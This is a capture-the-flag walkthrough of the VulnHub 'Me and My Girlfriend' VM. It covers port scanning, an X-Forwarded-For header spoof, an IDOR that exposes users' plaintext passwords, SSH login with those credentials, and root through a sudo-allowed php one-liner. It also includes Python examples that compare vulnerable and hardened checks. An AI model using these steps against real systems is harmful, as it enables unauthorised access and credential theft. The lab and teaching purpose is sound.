vulnhub - ME AND MY GIRLFRIEND

1 Target details

Target name: vulnhub - ME AND MY GIRLFRIEND: 1
Download link: https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova

1.1 Description

Description: This VM tells us that there is a pair of lovers, Alice and Bob. The couple used to be very romantic, but ever since Alice started working at a private company, "Ceban Corp", her attitude toward Bob has changed somewhat, as if something were being "hidden". Bob asks for your help to find what Alice is hiding and gain full access to the company!

Difficulty: Beginner

1.2 Hints

Note: there are 2 flag files

Learning: web application | simple privilege escalation

2 Target scanning

2.1 Host discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.0.0/24                            
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:08 EDT
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
MAC Address: F4:2A:7D:52:0E:DA (Tp-link Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.000055s latency).
MAC Address: 00:0C:29:D1:18:54 (VMware)
Nmap scan report for 192.168.0.107
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.11 seconds

Judging from what I know of my own network, the target machine should be 192.168.0.100.

2.2 Scanning for open ports

┌──(kali㉿kali)-[~/Me_and_My_girlfriend]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.0.100 -oA nmapscan/ports
# nmap defaults to a TCP scan, but its default mode is the -sS half-open (SYN) scan; -sT performs a full TCP connect scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:40 EDT
Nmap scan report for 192.168.0.100
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:D1:18:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

2.3 Scanning the TCP ports (service and OS detection)

┌──(kali㉿kali)-[~/Me_and_My_girlfriend]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.0.100                 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 10:42 EDT
Nmap scan report for 192.168.0.100
Host is up (0.00018s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:D1:18:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds

2.4 Scanning UDP ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.0.100    
# --top-ports 20 scans the 20 most common ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 22:14 EDT
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:D1:18:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

2.5 Scanning with nmap scripts

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.0.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 22:26 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.0.100
Host is up (0.00017s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:D1:18:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 345.54 seconds

3 Web penetration

3.1 Visiting the home page


The page says: "Who are you? Hacker? Sorry This Site Can Only Be Accessed local!"

Viewing the page source reveals a comment:

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

This hints that the site decides who is "local" by looking at the X-Forwarded-For (XFF) header.

Tip:
X-Forwarded-For is an HTTP header that carries the client's original IP address. When a client reaches a site through a proxy, the proxy appends the client's IP address to the X-Forwarded-For header so that the site can identify the client's real address. The header is commonly used to identify and track client IP addresses for security auditing, anti-spam and other network security purposes. The catch is that the header is written by whoever sends the request, so an application must only trust it when the request arrives from a proxy it knows; a site that believes the header from any peer, as this one does, lets the sender pick the address the access check sees.
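As an added example (not code from the page or from the VM), the following Python models the check the site appears to implement beside a hardened version. The naive function believes any X-Forwarded-For value, so a host on the LAN that sends "X-Forwarded-For: localhost" passes the "local only" gate; the hardened function honours the header only when the TCP peer is in a trusted-proxy list and otherwise uses the socket peer address. The trusted proxy 10.0.0.5/32 and the sample requests are constructed placeholders.

```python
"""X-Forwarded-For handling: the naive check this VM appears to use, beside a
hardened one. Added example, not code from the page or the VM; the
trusted-proxy address and the sample requests are constructed placeholders."""
import ipaddress

LOOPBACK_NETS = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128"))


def _parse_ip(text):
    """Return an ip_address for text, or None if it is not a literal address."""
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def is_local(addr):
    """'Local' the way the VM's page treats it: the literal 'localhost' or a loopback address."""
    if addr.strip().lower() == "localhost":
        return True
    ip = _parse_ip(addr)
    return ip is not None and any(ip in net for net in LOOPBACK_NETS)


def client_ip_naive(headers, remote_addr):
    """Vulnerable: whatever the request carries in X-Forwarded-For is believed,
    so the sender chooses the address the access check sees."""
    xff = headers.get("X-Forwarded-For", "")
    first_hop = xff.split(",")[0].strip()
    return first_hop or remote_addr


def client_ip_hardened(headers, remote_addr, trusted_proxies):
    """Hardened: honour X-Forwarded-For only when the TCP peer is a trusted proxy,
    then walk the chain from the right and stop at the first hop that is not a
    trusted proxy. Everything further left was written by an untrusted party."""
    trusted = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(addr):
        ip = _parse_ip(addr)
        return ip is not None and any(ip in net for net in trusted)

    if not is_trusted(remote_addr):
        return remote_addr  # direct client: the header is not authoritative
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not is_trusted(hop):
            return hop
    return remote_addr  # chain contained only trusted proxies


def allow_naive(headers, remote_addr):
    """Access decision of the 'local only' gate using the naive client address."""
    return is_local(client_ip_naive(headers, remote_addr))


def allow_hardened(headers, remote_addr, trusted_proxies=("10.0.0.5/32",)):
    """Same gate using the hardened client address. 10.0.0.5 is an assumed placeholder proxy."""
    return is_local(client_ip_hardened(headers, remote_addr, trusted_proxies))


if __name__ == "__main__":
    # Constructed request: a LAN host claiming to be localhost, as in the walkthrough.
    spoofed = {"X-Forwarded-For": "localhost"}
    print("naive gate   :", allow_naive(spoofed, "192.168.0.107"))     # True (bypassed)
    print("hardened gate:", allow_hardened(spoofed, "192.168.0.107"))  # False
```

Apache's mod_remoteip applies the same rule at the server level with the RemoteIPHeader and RemoteIPTrustedProxy directives, so the application code never has to parse the header itself and REMOTE_ADDR already holds the right answer.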

3.2 Directory brute force

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.0.100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
[sudo] password for kali: 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/03/22 22:29:06 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.0.100/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.0.100/config/]
/server-status        (Status: 403) [Size: 293]
Progress: 217368 / 220561 (98.55%)
===============================================================
2023/03/22 22:29:19 Finished
===============================================================

3.3 Brute forcing again with file extensions

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.0.100 -x txt,sql,rar,zip,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[sudo] password for kali: 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sql,rar,zip,tar,txt
[+] Timeout:                 10s
===============================================================
2023/03/22 23:20:16 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 312] [--> http://192.168.0.100/misc/]
/config               (Status: 301) [Size: 314] [--> http://192.168.0.100/config/]
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 293]
Progress: 1322788 / 1323366 (99.96%)
===============================================================
2023/03/22 23:21:40 Finished
===============================================================

Summary:

# /misc directory
http://192.168.0.100/misc/process.php # nothing visible in the front end; probably needs parameters
# /config directory
http://192.168.0.100/config/config.php # nothing visible in the front end; probably needs parameters
# /robots.txt
/heyhoo.txt # robots.txt allows crawlers to fetch the /heyhoo.txt page
http://192.168.0.100/heyhoo.txt 
    # Great! What you need now is reconn, attack and got the shell
# /server-status
Not accessible, but it reveals Apache/2.4.7 (Ubuntu) Server at 192.168.0.100 Port 80

3.4 Accessing with an XFF header

Using the Burp Suite proxy, add the header x-forwarded-for: localhost and visit the page.


With the header added, we can access the following pages.

Home page

http://192.168.0.100/?page=index


Login page

http://192.168.0.100/?page=login


Registration page

http://192.168.0.100/?page=register


About page

http://192.168.0.100/?page=about


Translation: Thanks to our efforts there are many great people! They have expertise in their own fields, which may be an opportunity for success in business or elsewhere!

The source of each of these pages showed nothing unusual and contained no comments.

3.5 Registering a user

Since there is little content without an account and registration is open, register an account and log in to look at the back end.


After logging in we can see three buttons:

Dashboard # content: a motivational quote
Profile # shows the user's name, username and a masked (asterisked) password
Logout

3.6 Horizontal privilege escalation

Before and after login, the URL changes noticeably:

http://192.168.0.100/index.php?page=profile&user_id=12

It carries the user's id at the end, so can we modify user_id to access other users' profiles?


By changing user_id we not only get other users' pages, but because the password is rendered into a text box, we can also read each user's password.

Tip: our own id is 12, so there may be 11 usernames and passwords before it.

Listed as: Name-username-password
Eweuh Tandingan-eweuhtandingan-skuyatuh
Aing Maung-aingmaung-qwerty!!!
Sunda Tea-sundatea-indONEsia
Sedih Aing Mah-sedihaingmah-cedihhihihi
Alice Geulis-alice-4lic3
Abdi Kasep-abdikasepak-dorrrrr

id=6/7/8/10/11 are empty
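As an added example (not the VM's code), here is a Python model of the profile lookup the walkthrough's behaviour implies, beside a hardened version. The vulnerable handler trusts the user_id parameter over the session and returns the stored plaintext password so the page can render it; the hardened one derives the profile from the session, refuses any other id, stores only a salted PBKDF2 hash and never sends the credential to the browser. The accounts and the session dict are constructed placeholders, not the VM's data.

```python
"""Profile lookup behind ?page=profile&user_id=N: the vulnerable handler beside a
hardened one. Added example, not the VM's code; the accounts below are
constructed placeholders, and the session is modelled as a dict holding the
logged-in user's id."""
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'salthex$digesthex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Constant-time comparison against the stored salted hash."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed placeholder accounts in the shape of tbl_users, stored the way the VM stores them: plaintext.
USERS_PLAINTEXT = {
    5: {"name": "Alice Example", "username": "alice", "password": "s3cret-a", "email": "alice@example.test"},
    12: {"name": "Test User", "username": "testuser", "password": "s3cret-t", "email": "test@example.test"},
}
# The same accounts with only a salted hash on disk.
USERS_HASHED = {uid: {**row, "password": hash_password(row["password"])} for uid, row in USERS_PLAINTEXT.items()}
PUBLIC_FIELDS = ("name", "username", "email")


def profile_vulnerable(session, params):
    """IDOR: the user_id query parameter is trusted over the session, and the
    plaintext password is returned so the page can render it in the form."""
    uid = int(params.get("user_id", session["user_id"]))
    row = USERS_PLAINTEXT.get(uid)
    return dict(row) if row else None


def can_view(session, params):
    """Authorisation: a profile may only be viewed by the logged-in user it belongs to."""
    uid = session.get("user_id")
    if uid is None:
        return False
    requested = params.get("user_id")
    if requested is None:
        return True
    try:
        return int(requested) == uid
    except ValueError:
        return False


def profile_hardened(session, params):
    """Resolves the profile from the session, refuses other ids, and never returns
    the credential (a masked field with the real value behind it is still a leak)."""
    if not can_view(session, params):
        return None
    row = USERS_HASHED[session["user_id"]]
    return {k: row[k] for k in PUBLIC_FIELDS}


def login(username, password):
    """Returns the user id on success, None otherwise; works only against hashes."""
    for uid, row in USERS_HASHED.items():
        if row["username"] == username and verify_password(password, row["password"]):
            return uid
    return None


if __name__ == "__main__":
    session = {"user_id": 12}  # constructed: logged in as the registered test account
    print("vulnerable:", profile_vulnerable(session, {"user_id": "5"}))  # another user's row, password included
    print("hardened  :", profile_hardened(session, {"user_id": "5"}))    # None
```

Besides the authorisation check, the reason the walkthrough can read every password is that the table holds them in clear and the profile page embeds them in the HTML; with hashes stored, even a successful IDOR would expose only non-secret fields.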

With credentials in hand and the SSH port open, we can try them one by one.

# ssh usernames do not contain spaces, so only the username:password pairs are tried
## here the alice / 4lic3 pair logs in successfully
┌──(kali㉿kali)-[~]
└─$ sudo ssh alice@192.168.0.100                                                        
alice@192.168.0.100's password: 
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ 

Note: try every credential pair you obtained, so that you are not stuck if privilege escalation fails from a single account.

4 Privilege escalation

4.1 Checking the current state and permissions

alice@gfriEND:~$ whoami
alice
alice@gfriEND:~$ uname -a
Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:/home$ ls # list the home directories to see which users exist
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php # a possible privilege escalation point

4.2 Digging through the database

From the config path found earlier, we obtain the database credentials:

alice@gfriEND:/home$ cd /var/www/html/config/
alice@gfriEND:/var/www/html/config$ ls
config.php
alice@gfriEND:/var/www/html/config$ cat config.php 
<?php
    $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ 

Then we log in to the database successfully:

alice@gfriEND:/var/www/html/config$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 95
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceban_corp         |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
MariaDB [(none)]> use ceban_corp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ceban_corp]> show tables;
+----------------------+
| Tables_in_ceban_corp |
+----------------------+
| tbl_users            |
+----------------------+
1 row in set (0.00 sec)
MariaDB [ceban_corp]> select * from tbl_users;
+----+-----------------+----------------+-------------+------------------------------+
| id | name            | username       | password    | email                        |
+----+-----------------+----------------+-------------+------------------------------+
|  1 | Eweuh Tandingan | eweuhtandingan | skuyatuh    | eweuhtandingan@cebancorp.com |
|  2 | Aing Maung      | aingmaung      | qwerty!!!   | aingmaung@cebancorp.com      |
|  3 | Sunda Tea       | sundatea       | indONEsia   | sundatea@cebancorp.com       |
|  4 | Sedih Aing Mah  | sedihaingmah   | cedihhihihi | sedihaingmah@cebancorp.com   |
|  5 | Alice Geulis    | alice          | 4lic3       | alice@cebancorp.com          |
|  9 | Abdi Kasep      | abdikasepak    | dorrrrr     | abdikasep@cebancorp.com      |
| 12 | test123         | testadmin      | testadmin   | test@test.com                |
+----+-----------------+----------------+-------------+------------------------------+
7 rows in set (0.00 sec)

4.3 Privilege escalation via php

Since php can be run with sudo, we can use php to execute commands directly; whether running a system command or spawning a reverse shell, either yields root.

alice@gfriEND:/var/www/html/config$ sudo /usr/bin/php -r "system('/bin/bash');"
root@gfriEND:/var/www/html/config# whoami
root

5 Getting the flags

root@gfriEND:~# find / | grep flag
/root/flag2.txt
/home/alice/.my_secret/flag1.txt




Author: kinght
Published: 2024-08-30
Updated: 2024-08-30